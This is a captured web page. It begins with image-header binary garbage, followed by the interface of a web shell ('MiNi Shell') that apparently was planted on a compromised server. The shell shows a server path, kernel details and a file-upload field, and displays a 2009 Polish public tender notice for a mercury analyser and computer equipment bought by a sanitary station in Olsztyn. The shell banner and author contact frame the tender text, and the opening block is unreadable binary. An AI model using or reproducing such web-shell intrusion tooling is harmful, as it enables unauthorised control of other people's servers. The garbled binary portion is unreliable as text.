JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090522/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090522/163056-N-2009.html

<p class="kh_header"><b>Olsztyn: Postępowanie o udzielenie zamówienia publicznego prowadzone w trybie przetargu nieograniczonego o wartości szacunkowej poniżej kwoty określonej w przepisach wydanych na podstawie art. 11 ust.8 ustawy Prawo zamówień publicznych (Dz.U. z 2007 r. Nr 223, poz. 1655 ze zm. ) na zakup, dostawę oraz montaż fabrycznie nowego analizatora rtęci wraz z zestawem komputerowym.</b><br>
<b>Numer ogłoszenia: 163056 - 2009; data zamieszczenia: 22.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzka Stacja Sanitarno-Epidemiologiczna , ul. Żołnierska 16/201, 10-561 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5279500, faks 089 5279788.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wsse.olsztyn.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.wsse.olsztyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Inspekcja Sanitarna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Postępowanie o udzielenie zamówienia publicznego prowadzone w trybie przetargu nieograniczonego o wartości szacunkowej poniżej kwoty określonej w przepisach wydanych na podstawie art. 11 ust.8 ustawy Prawo zamówień publicznych (Dz.U. z 2007 r. Nr 223, poz. 1655 ze zm. ) na zakup, dostawę oraz montaż fabrycznie nowego analizatora rtęci wraz z zestawem komputerowym..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie I -  LBŚiŻ - Analizator rtęci
Oferowany przedmiot zamówienia musi być fabrycznie nowy, wolny od wad, kompletny i  aktualnie produkowany na rynku. 

Wymagane parametry:
możliwość bezpośredniego oznaczania zawartości rtęci bez mineralizacji w materiale stałym i roztworach próbkach gazowych, bez dodatku substancji ułatwiających 
Granica wykrywalności mniejsze równe 0,001ng 
Źródło światła - niskociśnieniowa lampa rtęciowa
Zakres roboczy - 0,005 - 500ng
Odtwarzalność mniejsza równa 1,5%
Podawanie próbki - automatyczne
Możliwość zatężania próbki 
Gaz nośny - tlen
Zasilanie 230V 50Hz
Możliwość oznaczania próbek przy użyciu chlorku cyny II
Oczyszczanie gazów wylotowych w roztworze buforowym
Aplikacje w języku polskim
Oprogramowanie sterujące pracą spektrometru, umożliwiające zbieranie, obróbkę i aktywizację danych pracujące w środowisku Windows XP

Dodatkowe wyposażenie :     
zestaw komputerowy z drukarką  - określony poniżej
zestaw łódeczek niklowych (na 500?l  i na 1000?l) po szt.10
zestaw akcesoriów zużywalnych w okresie 2 lat, wskazanych w instrukcji obsługi lub dokumencie równoważnym opracowanym przez producenta urządzenia jako części zużywalne w okresie 2 lat. (rura do mineralizacji - szt.2, uszczelki - szt. 4, łączniki - szt. 4, układ amalgamacji - szt.4, części zużywalne podajnika - 4 komplety)

instrukcja obsługi urządzenia w języku polskim

Zestaw komputerowy z drukarką:

Komputer Dell  OptiPlex 330 MT + monitor 19 cali LCD panoramiczny lub komputer o parametrach równoważnych, tj:
- min. procesor 2,2GHz dwurdzeniowy;
- min. 160 GB HDD;
- min. 2GB RAM;
- DVD-RW;
- klawiatura + myszka;
- System operacyjny Windows XP Professional PL;
- monitor 19 cali LCD panoramiczny.

Drukarka laserowa kolorowa OKI C5850dn lub drukarka o parametrach równoważnych:
Typ: Drukarka laserowa kolorowa.
- Maks. rozmiar nośnika A4
- wydajność tonera czarnego 5000 stron, przy 5% pokryciu strony
- wydajność tonera cyjan 5000 stron, przy 5% pokryciu strony
- wydajność tonera Magenta 5000 stron, przy 5% pokryciu strony
- wydajność tonera yellow 5000 stron, przy 5% pokryciu strony
- Rozdzielczość w pionie (mono) 1200 dpi
- Rozdzielczość w poziomie (mono) 600 dpi
- Rozdzielczość w pionie (kolor) 1200 dpi
- Rozdzielczość w poziomie (kolor) 600 dpi
- Szybkość druku (mono) ok 32 str./min.
- Szybkość druku (kolor) ok 26 str./min.
- Pojemność podajnika papieru 300 szt.
- Druk dwustronny.
- Prędkość procesora min. 200 MHz
- Zainstalowana pamięć  min. 64 MB
- Złącza zewnętrzne:
USB 2.0
karta Ethernet 10/100BaseTx
-Obsługiwane systemy operacyjne:
Microsoft Windows 2000
Microsoft Windows XP Home
Microsoft Windows XP Professional
Microsoft Windows XP Professional x64
Microsoft Windows Server 2003
Microsoft Windows Vista
Microsoft Windows 2003 Server x64


Warunki gwarancji:
serwis gwarancyjny i pogwarancyjny w Polsce 
odpowiedzialność dostawcy z tytułu gwarancji oraz rękojmi za wady co najmniej 12 miesięcy od dnia instalacji, tj. podpisania protokołu zdawczo-odbiorczy
naprawa lub wymiana wadliwych części albo układów, które uległy uszkodzeniu z przyczyn  wad konstrukcyjnych, produkcyjnych lub materiałowych w przeciągu dwóch tygodni od daty formalnego zgłoszenia usterki w siedzibie Zamawiającego. Zgłoszenie dokonane faxem, telefonicznie lub pocztą elektroniczną uważać się będzie za skutecznie dokonane.
W przypadku zaistnienia konieczności naprawy urządzenia poza siedzibą Zamawiającego koszty transportu pokrywa Wykonawca. Naprawa lub wymiana wadliwych części albo układów, które uległy uszkodzeniu z przyczyn  wad konstrukcyjnych, produkcyjnych lub materiałowych w przeciągu dwóch tygodni od daty formalnego zgłoszenia usterki.
przedłużenie terminu gwarancji o czas, od kiedy urządzenie zostanie wyłączone z użytkowania z powodu usterki technicznej, wad konstrukcyjnych, produkcyjnych lub materiałowych do zakończenia naprawy
jeżeli naprawa spowoduje wyłączenie urządzenia na okres dłuższy niż 1 miesiąc Wykonawca zobowiązuje się dostarczyć urządzenie  zastępcze o takich samych parametrach na czas trwania naprawy;
trzykrotna naprawa  tego samego elementu lub podzespołu powoduje jego wymianę na nowy;
udzielenie 12 miesięcznej gwarancji dla części zainstalowanych w trakcie naprawy;
Przed upływem ostatecznego terminu gwarancji (1 miesiąc wcześniej) Wykonawca dokona kompleksowego przeglądu gwarancyjnego całej aparatury.



Usługi wliczone w ramach oferty:
dostawa analizatora rtęci do siedziby Zamawiającego
instalacja i uruchomienie urządzenia
bezpłatny serwis gwarancyjny
szkolenie 4 pracowników w WSSE w Olsztynie:
      - szkolenie przy instalacji z obsługi sprzętu
      - szkolenie po 3-miesiącu pracy urządzenia 



Dostawa i instalacja/uruchomienie analizatora rtęci nastąpi w terminie do 7 dni od daty podpisania umowy do siedziby Zamawiającego: Olsztyn, ul. Żołnierska 16, Laboratorium Badań Środowiskowych i Żywności.

Płatność nastąpi do 30 dni po wystawieniu faktury.
Faktura może zostać wystawiona dostarczeniu do Zamawiającego przedmiotu zamówienia i podpisaniu protokołu zdawczo-odbiorczego (załącznik nr 4)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 38.43.40.00-6, 30.20.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 1.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy: 
1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności określonej w przedmiocie zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień tj. muszą przedstawić aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert ;
2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wy?konania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonywania zamówienia, tj. przedstawią podpisane oświadczenie (zał. nr 2);
3.	znajdują się w sytuacji ekonomicznej i finansowej za?pewniającej wykonanie zamówienia, tj. przedstawią podpisane oświadczenie, że znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia (zał. nr 2);
4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych (Dz. U.  z 2008 r. Nr 171, poz. 1058 ze zm.), tj. przedstawią podpisane oświadczenie, że nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy Prawo zamówień publicznych (zał. nr 2).
oraz złożyli wszystkie wymagane oświadczenia, dokumenty i formularze wymagane przez Zamawiającego. 

Zamawiający dokona oceny spełniania przez Wykonawcę warunków udziału w postępowaniu na zasadzie : spełnia nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> VI.	Wykaz oświadczeń lub dokumentów, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu:

Dokumenty podmiotowe:
W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych należy złożyć: 

aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;
oświadczenie, że Wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (załącznik nr 2 do SIWZ),

W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawienia pisemnego zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia należy złożyć:

oświadczenie Wykonawcy o spełnianiu warunków wskazanych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (załącznik nr 2 do SIWZ),

W celu potwierdzenia opisanego przez Zamawiającego warunku znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonania zamówienia należy złożyć: 

oświadczenie Wykonawcy o spełnianiu warunków wskazanych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (załącznik nr 2 do SIWZ),


Dokumenty należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Zamawiający może zażądać przedstawienia oryginałów lub notarialnie potwierdzonych kopii dokumentów. Poświadczenie za zgodność z oryginałem winno być sporządzone w sposób umożliwiający identyfikację podpisu np. wraz z imienną pieczątką osoby poświadczającej kopię dokumentu za zgodność z oryginałem. W przypadku poświadczenia za zgodność z oryginałem kopii dokumentów przez osobę nie wymienioną w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo.
Dokumenty sporządzone w języku obcym mają być złożone wraz z tłumaczeniem na język polski poświadczonym przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wsse.olsztyn.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzka Stacja Sanitarno-Epidemiologiczna ul. Żołnierska 16, pok. 201 Olsztyn.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.06.2009 godzina 10:00, miejsce: Wojewódzka Stacja Sanitarno-Epidemiologiczna ul. Żołnierska 16, pok. 201 Olsztyn.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com